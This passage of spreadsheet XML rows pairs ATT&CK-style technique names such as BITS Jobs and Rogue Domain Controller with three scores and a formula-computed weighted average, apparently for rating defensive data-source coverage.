      <c r="C188" s="45" t="s">
        <v>1483</v>
      </c>
      <c r="D188" s="14">
        <v>2</v>
      </c>
      <c r="E188" s="14">
        <v>3</v>
      </c>
      <c r="F188" s="14">
        <v>4</v>
      </c>
      <c r="G188" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="189" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A189" s="43" t="s">
        <v>307</v>
      </c>
      <c r="B189" s="41" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:B)</f>
        <v>Forced Authentication</v>
      </c>
      <c r="C189" s="45" t="s">
        <v>3083</v>
      </c>
      <c r="D189" s="14">
        <v>1</v>
      </c>
      <c r="E189" s="14">
        <v>3</v>
      </c>
      <c r="F189" s="14">
        <v>4</v>
      </c>
      <c r="G189" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="190" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A190" s="43" t="s">
        <v>308</v>
      </c>
      <c r="B190" s="41" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:B)</f>
        <v>Drive-by Compromise</v>
      </c>
      <c r="C190" s="45" t="s">
        <v>1487</v>
      </c>
      <c r="D190" s="14">
        <v>2</v>
      </c>
      <c r="E190" s="14">
        <v>3</v>
      </c>
      <c r="F190" s="14">
        <v>4</v>
      </c>
      <c r="G190" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A191" s="43" t="s">
        <v>310</v>
      </c>
      <c r="B191" s="41" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C191" s="45" t="s">
        <v>1493</v>
      </c>
      <c r="D191" s="14">
        <v>1</v>
      </c>
      <c r="E191" s="14">
        <v>3</v>
      </c>
      <c r="F191" s="14">
        <v>4</v>
      </c>
      <c r="G191" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="192" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A192" s="43" t="s">
        <v>311</v>
      </c>
      <c r="B192" s="41" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C192" s="45" t="s">
        <v>3084</v>
      </c>
      <c r="D192" s="14">
        <v>3</v>
      </c>
      <c r="E192" s="14">
        <v>4</v>
      </c>
      <c r="F192" s="14">
        <v>5</v>
      </c>
      <c r="G192" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="193" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A193" s="43" t="s">
        <v>313</v>
      </c>
      <c r="B193" s="41" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C193" s="45" t="s">
        <v>2432</v>
      </c>
      <c r="D193" s="14">
        <v>2</v>
      </c>
      <c r="E193" s="14">
        <v>4</v>
      </c>
      <c r="F193" s="14">
        <v>5</v>
      </c>
      <c r="G193" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A194" s="43" t="s">
        <v>315</v>
      </c>
      <c r="B194" s="41" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C194" s="45" t="s">
        <v>2427</v>
      </c>
      <c r="D194" s="14">
        <v>3</v>
      </c>
      <c r="E194" s="14">
        <v>4</v>
      </c>
      <c r="F194" s="14">
        <v>5</v>
      </c>
      <c r="G194" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A195" s="43" t="s">
        <v>317</v>
      </c>
      <c r="B195" s="41" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C195" s="45" t="s">
        <v>2437</v>
      </c>
      <c r="D195" s="14">
        <v>1</v>
      </c>
      <c r="E195" s="14">
        <v>3</v>
      </c>
      <c r="F195" s="14">
        <v>4</v>
      </c>
      <c r="G195" s="32">
        <f t="shared" ref="G195:G258" si="3">((D195*2)+(E195*2)+F195)/5</f>
        <v>2.4</v>
      </c>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A196" s="43" t="s">
        <v>318</v>
      </c>
      <c r="B196" s="41" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:B)</f>
        <v>Supply Chain Compromise</v>
      </c>
      <c r="C196" s="45" t="s">
        <v>1498</v>
      </c>
      <c r="D196" s="14">
        <v>1</v>
      </c>
      <c r="E196" s="14">
        <v>2</v>
      </c>
      <c r="F196" s="14">
        <v>4</v>
      </c>
      <c r="G196" s="32">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A197" s="43" t="s">
        <v>319</v>
      </c>
      <c r="B197" s="41" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:B)</f>
        <v>Compromise Hardware Supply Chain</v>
      </c>
      <c r="C197" s="45" t="s">
        <v>3085</v>
      </c>
      <c r="D197" s="14">
        <v>2</v>
      </c>
      <c r="E197" s="14">
        <v>4</v>
      </c>
      <c r="F197" s="14">
        <v>5</v>
      </c>
      <c r="G197" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A198" s="43" t="s">
        <v>321</v>
      </c>
      <c r="B198" s="41" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:B)</f>
        <v>BITS Jobs</v>
      </c>
      <c r="C198" s="45" t="s">
        <v>3086</v>
      </c>
      <c r="D198" s="14">
        <v>3</v>
      </c>
      <c r="E198" s="14">
        <v>4</v>
      </c>
      <c r="F198" s="14">
        <v>5</v>
      </c>
      <c r="G198" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A199" s="43" t="s">
        <v>322</v>
      </c>
      <c r="B199" s="41" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:B)</f>
        <v>BITS Jobs</v>
      </c>
      <c r="C199" s="45" t="s">
        <v>3087</v>
      </c>
      <c r="D199" s="14">
        <v>2</v>
      </c>
      <c r="E199" s="14">
        <v>3</v>
      </c>
      <c r="F199" s="14">
        <v>4</v>
      </c>
      <c r="G199" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A200" s="43" t="s">
        <v>323</v>
      </c>
      <c r="B200" s="41" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:B)</f>
        <v>Trusted Relationship</v>
      </c>
      <c r="C200" s="45" t="s">
        <v>1520</v>
      </c>
      <c r="D200" s="14">
        <v>2</v>
      </c>
      <c r="E200" s="14">
        <v>3</v>
      </c>
      <c r="F200" s="14">
        <v>4</v>
      </c>
      <c r="G200" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A201" s="43" t="s">
        <v>324</v>
      </c>
      <c r="B201" s="41" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:B)</f>
        <v>Hardware Additions</v>
      </c>
      <c r="C201" s="45" t="s">
        <v>1525</v>
      </c>
      <c r="D201" s="14">
        <v>1</v>
      </c>
      <c r="E201" s="14">
        <v>3</v>
      </c>
      <c r="F201" s="14">
        <v>4</v>
      </c>
      <c r="G201" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A202" s="43" t="s">
        <v>325</v>
      </c>
      <c r="B202" s="41" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:B)</f>
        <v>Password Policy Discovery</v>
      </c>
      <c r="C202" s="45" t="s">
        <v>865</v>
      </c>
      <c r="D202" s="14">
        <v>3</v>
      </c>
      <c r="E202" s="14">
        <v>4</v>
      </c>
      <c r="F202" s="14">
        <v>5</v>
      </c>
      <c r="G202" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A203" s="43" t="s">
        <v>326</v>
      </c>
      <c r="B203" s="41" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:B)</f>
        <v>Indirect Command Execution</v>
      </c>
      <c r="C203" s="45" t="s">
        <v>859</v>
      </c>
      <c r="D203" s="14">
        <v>2</v>
      </c>
      <c r="E203" s="14">
        <v>4</v>
      </c>
      <c r="F203" s="14">
        <v>5</v>
      </c>
      <c r="G203" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A204" s="43" t="s">
        <v>327</v>
      </c>
      <c r="B204" s="41" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Client Execution</v>
      </c>
      <c r="C204" s="45" t="s">
        <v>1536</v>
      </c>
      <c r="D204" s="14">
        <v>2</v>
      </c>
      <c r="E204" s="14">
        <v>3</v>
      </c>
      <c r="F204" s="14">
        <v>4</v>
      </c>
      <c r="G204" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A205" s="43" t="s">
        <v>328</v>
      </c>
      <c r="B205" s="41" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:B)</f>
        <v>User Execution</v>
      </c>
      <c r="C205" s="45" t="s">
        <v>1540</v>
      </c>
      <c r="D205" s="14">
        <v>3</v>
      </c>
      <c r="E205" s="14">
        <v>4</v>
      </c>
      <c r="F205" s="14">
        <v>5</v>
      </c>
      <c r="G205" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A206" s="43" t="s">
        <v>329</v>
      </c>
      <c r="B206" s="41" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:B)</f>
        <v>Traffic Signaling</v>
      </c>
      <c r="C206" s="45" t="s">
        <v>1553</v>
      </c>
      <c r="D206" s="14">
        <v>1</v>
      </c>
      <c r="E206" s="14">
        <v>3</v>
      </c>
      <c r="F206" s="14">
        <v>4</v>
      </c>
      <c r="G206" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A207" s="43" t="s">
        <v>330</v>
      </c>
      <c r="B207" s="41" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:B)</f>
        <v>Port Knocking</v>
      </c>
      <c r="C207" s="45" t="s">
        <v>2085</v>
      </c>
      <c r="D207" s="14">
        <v>2</v>
      </c>
      <c r="E207" s="14">
        <v>4</v>
      </c>
      <c r="F207" s="14">
        <v>5</v>
      </c>
      <c r="G207" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A208" s="43" t="s">
        <v>331</v>
      </c>
      <c r="B208" s="41" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C208" s="45" t="s">
        <v>1563</v>
      </c>
      <c r="D208" s="14">
        <v>4</v>
      </c>
      <c r="E208" s="14">
        <v>5</v>
      </c>
      <c r="F208" s="14">
        <v>5</v>
      </c>
      <c r="G208" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A209" s="43" t="s">
        <v>333</v>
      </c>
      <c r="B209" s="41" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C209" s="45" t="s">
        <v>584</v>
      </c>
      <c r="D209" s="14">
        <v>4</v>
      </c>
      <c r="E209" s="14">
        <v>5</v>
      </c>
      <c r="F209" s="14">
        <v>5</v>
      </c>
      <c r="G209" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A210" s="43" t="s">
        <v>334</v>
      </c>
      <c r="B210" s="41" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C210" s="45" t="s">
        <v>2024</v>
      </c>
      <c r="D210" s="14">
        <v>3</v>
      </c>
      <c r="E210" s="14">
        <v>4</v>
      </c>
      <c r="F210" s="14">
        <v>5</v>
      </c>
      <c r="G210" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A211" s="43" t="s">
        <v>336</v>
      </c>
      <c r="B211" s="41" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:B)</f>
        <v>Exploitation of Remote Services</v>
      </c>
      <c r="C211" s="45" t="s">
        <v>1567</v>
      </c>
      <c r="D211" s="14">
        <v>1</v>
      </c>
      <c r="E211" s="14">
        <v>3</v>
      </c>
      <c r="F211" s="14">
        <v>4</v>
      </c>
      <c r="G211" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A212" s="43" t="s">
        <v>337</v>
      </c>
      <c r="B212" s="41" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Defense Evasion</v>
      </c>
      <c r="C212" s="45" t="s">
        <v>1567</v>
      </c>
      <c r="D212" s="14">
        <v>1</v>
      </c>
      <c r="E212" s="14">
        <v>3</v>
      </c>
      <c r="F212" s="14">
        <v>4</v>
      </c>
      <c r="G212" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A213" s="43" t="s">
        <v>338</v>
      </c>
      <c r="B213" s="41" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Credential Access</v>
      </c>
      <c r="C213" s="45" t="s">
        <v>1575</v>
      </c>
      <c r="D213" s="14">
        <v>1</v>
      </c>
      <c r="E213" s="14">
        <v>3</v>
      </c>
      <c r="F213" s="14">
        <v>4</v>
      </c>
      <c r="G213" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A214" s="43" t="s">
        <v>339</v>
      </c>
      <c r="B214" s="41" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:B)</f>
        <v>Data from Information Repositories</v>
      </c>
      <c r="C214" s="45" t="s">
        <v>3088</v>
      </c>
      <c r="D214" s="14">
        <v>2</v>
      </c>
      <c r="E214" s="14">
        <v>3</v>
      </c>
      <c r="F214" s="14">
        <v>4</v>
      </c>
      <c r="G214" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A215" s="43" t="s">
        <v>340</v>
      </c>
      <c r="B215" s="41" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:B)</f>
        <v>Sharepoint</v>
      </c>
      <c r="C215" s="45" t="s">
        <v>2079</v>
      </c>
      <c r="D215" s="14">
        <v>2</v>
      </c>
      <c r="E215" s="14">
        <v>4</v>
      </c>
      <c r="F215" s="14">
        <v>5</v>
      </c>
      <c r="G215" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A216" s="43" t="s">
        <v>341</v>
      </c>
      <c r="B216" s="41" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:B)</f>
        <v>Sharepoint</v>
      </c>
      <c r="C216" s="45" t="s">
        <v>3089</v>
      </c>
      <c r="D216" s="14">
        <v>1</v>
      </c>
      <c r="E216" s="14">
        <v>3</v>
      </c>
      <c r="F216" s="14">
        <v>4</v>
      </c>
      <c r="G216" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A217" s="43" t="s">
        <v>342</v>
      </c>
      <c r="B217" s="41" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:B)</f>
        <v>Signed Script Proxy Execution</v>
      </c>
      <c r="C217" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D217" s="14">
        <v>3</v>
      </c>
      <c r="E217" s="14">
        <v>4</v>
      </c>
      <c r="F217" s="14">
        <v>5</v>
      </c>
      <c r="G217" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A218" s="43" t="s">
        <v>343</v>
      </c>
      <c r="B218" s="41" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:B)</f>
        <v>Browser Bookmark Discovery</v>
      </c>
      <c r="C218" s="45" t="s">
        <v>1602</v>
      </c>
      <c r="D218" s="14">
        <v>2</v>
      </c>
      <c r="E218" s="14">
        <v>3</v>
      </c>
      <c r="F218" s="14">
        <v>5</v>
      </c>
      <c r="G218" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A219" s="43" t="s">
        <v>344</v>
      </c>
      <c r="B219" s="41" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:B)</f>
        <v>Signed Binary Proxy Execution</v>
      </c>
      <c r="C219" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D219" s="14">
        <v>3</v>
      </c>
      <c r="E219" s="14">
        <v>4</v>
      </c>
      <c r="F219" s="14">
        <v>5</v>
      </c>
      <c r="G219" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A220" s="43" t="s">
        <v>345</v>
      </c>
      <c r="B220" s="41" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:B)</f>
        <v>Remote Access Software</v>
      </c>
      <c r="C220" s="45" t="s">
        <v>1665</v>
      </c>
      <c r="D220" s="14">
        <v>2</v>
      </c>
      <c r="E220" s="14">
        <v>4</v>
      </c>
      <c r="F220" s="14">
        <v>4</v>
      </c>
      <c r="G220" s="32">
        <f t="shared" si="3"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A221" s="43" t="s">
        <v>346</v>
      </c>
      <c r="B221" s="41" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:B)</f>
        <v>XSL Script Processing</v>
      </c>
      <c r="C221" s="45" t="s">
        <v>1669</v>
      </c>
      <c r="D221" s="14">
        <v>3</v>
      </c>
      <c r="E221" s="14">
        <v>4</v>
      </c>
      <c r="F221" s="14">
        <v>5</v>
      </c>
      <c r="G221" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A222" s="43" t="s">
        <v>347</v>
      </c>
      <c r="B222" s="41" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:B)</f>
        <v>Template Injection</v>
      </c>
      <c r="C222" s="45" t="s">
        <v>1673</v>
      </c>
      <c r="D222" s="14">
        <v>2</v>
      </c>
      <c r="E222" s="14">
        <v>4</v>
      </c>
      <c r="F222" s="14">
        <v>5</v>
      </c>
      <c r="G222" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A223" s="43" t="s">
        <v>348</v>
      </c>
      <c r="B223" s="41" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:B)</f>
        <v>File and Directory Permissions Modification</v>
      </c>
      <c r="C223" s="45" t="s">
        <v>859</v>
      </c>
      <c r="D223" s="14">
        <v>3</v>
      </c>
      <c r="E223" s="14">
        <v>4</v>
      </c>
      <c r="F223" s="14">
        <v>5</v>
      </c>
      <c r="G223" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A224" s="43" t="s">
        <v>349</v>
      </c>
      <c r="B224" s="41" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:B)</f>
        <v>Linux and Mac File and Directory Permissions Modification</v>
      </c>
      <c r="C224" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D224" s="14">
        <v>2</v>
      </c>
      <c r="E224" s="14">
        <v>4</v>
      </c>
      <c r="F224" s="14">
        <v>5</v>
      </c>
      <c r="G224" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A225" s="43" t="s">
        <v>350</v>
      </c>
      <c r="B225" s="41" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:B)</f>
        <v>Execution Guardrails</v>
      </c>
      <c r="C225" s="45" t="s">
        <v>589</v>
      </c>
      <c r="D225" s="14">
        <v>2</v>
      </c>
      <c r="E225" s="14">
        <v>4</v>
      </c>
      <c r="F225" s="14">
        <v>5</v>
      </c>
      <c r="G225" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A226" s="43" t="s">
        <v>351</v>
      </c>
      <c r="B226" s="41" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:B)</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="C226" s="45" t="s">
        <v>1698</v>
      </c>
      <c r="D226" s="14">
        <v>3</v>
      </c>
      <c r="E226" s="14">
        <v>4</v>
      </c>
      <c r="F226" s="14">
        <v>5</v>
      </c>
      <c r="G226" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A227" s="43" t="s">
        <v>353</v>
      </c>
      <c r="B227" s="41" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:B)</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="C227" s="45" t="s">
        <v>3090</v>
      </c>
      <c r="D227" s="14">
        <v>3</v>
      </c>
      <c r="E227" s="14">
        <v>4</v>
      </c>
      <c r="F227" s="14">
        <v>5</v>
      </c>
      <c r="G227" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A228" s="43" t="s">
        <v>355</v>
      </c>
      <c r="B228" s="41" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:B)</f>
        <v>Group Policy Modification</v>
      </c>
      <c r="C228" s="45" t="s">
        <v>584</v>
      </c>
      <c r="D228" s="14">
        <v>4</v>
      </c>
      <c r="E228" s="14">
        <v>4</v>
      </c>
      <c r="F228" s="14">
        <v>5</v>
      </c>
      <c r="G228" s="32">
        <f t="shared" si="3"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A229" s="43" t="s">
        <v>356</v>
      </c>
      <c r="B229" s="41" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:B)</f>
        <v>Data Destruction</v>
      </c>
      <c r="C229" s="45" t="s">
        <v>722</v>
      </c>
      <c r="D229" s="14">
        <v>2</v>
      </c>
      <c r="E229" s="14">
        <v>3</v>
      </c>
      <c r="F229" s="14">
        <v>5</v>
      </c>
      <c r="G229" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A230" s="43" t="s">
        <v>357</v>
      </c>
      <c r="B230" s="41" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C230" s="45" t="s">
        <v>1710</v>
      </c>
      <c r="D230" s="14">
        <v>2</v>
      </c>
      <c r="E230" s="14">
        <v>3</v>
      </c>
      <c r="F230" s="14">
        <v>5</v>
      </c>
      <c r="G230" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A231" s="43" t="s">
        <v>359</v>
      </c>
      <c r="B231" s="41" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C231" s="45" t="s">
        <v>3091</v>
      </c>
      <c r="D231" s="14">
        <v>2</v>
      </c>
      <c r="E231" s="14">
        <v>3</v>
      </c>
      <c r="F231" s="14">
        <v>5</v>
      </c>
      <c r="G231" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A232" s="43" t="s">
        <v>360</v>
      </c>
      <c r="B232" s="41" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:B)</f>
        <v>Data Encrypted for Impact</v>
      </c>
      <c r="C232" s="45" t="s">
        <v>2294</v>
      </c>
      <c r="D232" s="14">
        <v>2</v>
      </c>
      <c r="E232" s="14">
        <v>3</v>
      </c>
      <c r="F232" s="14">
        <v>5</v>
      </c>
      <c r="G232" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A233" s="43" t="s">
        <v>361</v>
      </c>
      <c r="B233" s="41" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:B)</f>
        <v>Service Stop</v>
      </c>
      <c r="C233" s="45" t="s">
        <v>3092</v>
      </c>
      <c r="D233" s="14">
        <v>4</v>
      </c>
      <c r="E233" s="14">
        <v>5</v>
      </c>
      <c r="F233" s="14">
        <v>5</v>
      </c>
      <c r="G233" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A234" s="43" t="s">
        <v>362</v>
      </c>
      <c r="B234" s="41" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:B)</f>
        <v>Inhibit System Recovery</v>
      </c>
      <c r="C234" s="45" t="s">
        <v>1718</v>
      </c>
      <c r="D234" s="14">
        <v>4</v>
      </c>
      <c r="E234" s="14">
        <v>5</v>
      </c>
      <c r="F234" s="14">
        <v>5</v>
      </c>
      <c r="G234" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A235" s="43" t="s">
        <v>363</v>
      </c>
      <c r="B235" s="41" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:B)</f>
        <v>Defacement</v>
      </c>
      <c r="C235" s="45" t="s">
        <v>1722</v>
      </c>
      <c r="D235" s="14">
        <v>3</v>
      </c>
      <c r="E235" s="14">
        <v>4</v>
      </c>
      <c r="F235" s="14">
        <v>5</v>
      </c>
      <c r="G235" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A236" s="43" t="s">
        <v>364</v>
      </c>
      <c r="B236" s="41" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C236" s="45" t="s">
        <v>1811</v>
      </c>
      <c r="D236" s="14">
        <v>2</v>
      </c>
      <c r="E236" s="14">
        <v>3</v>
      </c>
      <c r="F236" s="14">
        <v>5</v>
      </c>
      <c r="G236" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A237" s="43" t="s">
        <v>365</v>
      </c>
      <c r="B237" s="41" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C237" s="45" t="s">
        <v>2412</v>
      </c>
      <c r="D237" s="14">
        <v>0</v>
      </c>
      <c r="E237" s="14">
        <v>1</v>
      </c>
      <c r="F237" s="14">
        <v>3</v>
      </c>
      <c r="G237" s="32">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A238" s="43" t="s">
        <v>366</v>
      </c>
      <c r="B238" s="41" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:B)</f>
        <v>External Defacement</v>
      </c>
      <c r="C238" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D238" s="14">
        <v>1</v>
      </c>
      <c r="E238" s="14">
        <v>3</v>
      </c>
      <c r="F238" s="14">
        <v>4</v>
      </c>
      <c r="G238" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A239" s="43" t="s">
        <v>367</v>
      </c>
      <c r="B239" s="41" t="str">
